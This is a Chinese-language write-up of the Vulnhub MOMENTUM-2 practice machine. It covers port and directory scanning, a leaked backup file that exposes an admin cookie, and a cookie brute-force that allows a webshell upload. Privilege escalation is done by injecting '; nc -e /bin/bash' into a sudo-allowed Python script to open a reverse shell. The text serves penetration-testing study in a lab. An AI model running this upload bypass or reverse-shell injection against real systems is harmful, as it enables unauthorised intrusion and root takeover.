Vulnhub——MOMENTUM-2

Vulnhub——MOMENTUM-2

一、信息收集

1.存活主机扫描

┌──(root㉿kali)-[/home/han]
└─# nmap 192.168.197.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 13:41 CST
Nmap scan report for 192.168.197.1
Host is up (0.00047s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6000/tcp open  X11
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.197.2
Host is up (0.00013s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:F2:C0:58 (VMware)

Nmap scan report for 192.168.197.129
Host is up (0.00065s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:E4:A7:D1 (VMware)

Nmap scan report for 192.168.197.254
Host is up (0.00017s latency).
All 1000 scanned ports on 192.168.197.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:E7:D5:1C (VMware)

Nmap scan report for 192.168.197.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (5 hosts up) scanned in 7.84 seconds

2.端口探测

┌──(root㉿kali)-[/home/han]
└─# nmap -A -p- 192.168.197.129
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 13:42 CST
Nmap scan report for 192.168.197.129
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
|   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
|_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Momentum 2 | Index
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E4:A7:D1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 192.168.197.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds

3.目录探测

┌──(root㉿kali)-[/home/han]
└─# dirsearch -u http://192.168.197.129 -w /home/han/dicc.txt -x 403

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10913

Output File: /root/.dirsearch/reports/192.168.197.129/_23-02-23_13-40-44.txt

Error Log: /root/.dirsearch/logs/errors-23-02-23_13-40-44.log

Target: http://192.168.197.129/

[13:40:44] Starting:
[13:40:44] 301 -  315B  - /js  ->  http://192.168.197.129/js/
[13:40:57] 200 -    0B  - /ajax.php
[13:40:57] 200 -  357B  - /ajax.php.bak
[13:41:02] 301 -  316B  - /css  ->  http://192.168.197.129/css/
[13:41:02] 200 -  513B  - /dashboard.html
[13:41:07] 301 -  316B  - /img  ->  http://192.168.197.129/img/
[13:41:07] 200 -    1KB - /index.html
[13:41:08] 200 -  931B  - /js/
[13:41:10] 200 -  626B  - /manual/index.html
[13:41:10] 301 -  319B  - /manual  ->  http://192.168.197.129/manual/
[13:41:13] 200 -  928B  - /owls/

Task Completed

二、渗透过程

1.存在文件上传

发现存在一个上传界面

http://192.168.197.129/dashboard.html

经过测试发现只允许上传txt文件

并且可看到他的上传路径

http://192.168.197.129/owls/

上面还发现了一个，/ajax.php.bak，备份文件

//The boss told me to add one more Upper Case letter at the end of the cookie
   if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){

       //[+] Add if $_POST['secure'] == 'val1d'
        $valid_ext = array("pdf","php","txt");
   }
   else{

        $valid_ext = array("txt");
   }

   // Remember success upload returns 1 

查看发现需要添加cookie值为：admin：‘&G6u@B6uDXMq&Ms’ 第一句话提示我们末尾要再添加一个大写字母

还需要要POST的secure的参数值为：val1d，

例：

作为multipart body中的消息头
在 HTTP 场景中。第一个参数总是固定不变的 form-data；附加的参数不区分大小写，并且拥有参数值，参数名与参数值用等号('=')连接，参数值用双引号括起来。参数之间用分号(';')分隔。
Content-Disposition: form-data
Content-Disposition: form-data; name="fieldName"
Content-Disposition: form-data; name="fieldName"; filename="filename.jpg"

成功会返回一个1

2.漏洞利用

添加cookie值、编写POST请求，并添加POST请求值

对最后一位的cookie值进行爆破

最后发现R时，成功上传

上传成功，使用蚁剑进行连接

发现了一个flag、一个用户（athena）和密码（myvulnerableapp[Asterisk]）

密码里面有个[Asterisk],查询后发现是一个*号

用户名：athena 密码：myvulnerableapp*

尝试进行连接

三、提权

查看权限

可以无密码执行cookie-gen.py脚本

先看一下这个脚本，发现需要添加一个seed参数，可以执行cmd的命令。

执行脚本，编写语句nc反弹shell

同时进行监听

sudo python3 /home/team-tasks/cookie-gen.py
; nc -e /bin/bash 192.168.197.128 8888

获取root权限

四、总结

今天环境就搞了好久

1.无法更改虚拟机的设备信息

后来修改虚拟机的硬件兼容性为16.x后就好了

2.一直探测不到靶机ip，后来通过查寻发现，原来是靶机的网卡配置错了

进入单用户模式修改网卡

开机时按shift，进入加载的进度条界面

按e进入选择内核界面删除ro

修改为：rw signie init=/bin/bash rw读写 signie单用户 命令权限/bin/bash

ctrl+x键，进入单用户模式

查看网卡信息

修改网卡文件，修改成一样的网卡（ens33）

重启网卡

/etc/init.d/networking restart

之后重启虚拟机，kali就扫到了这台靶机的ip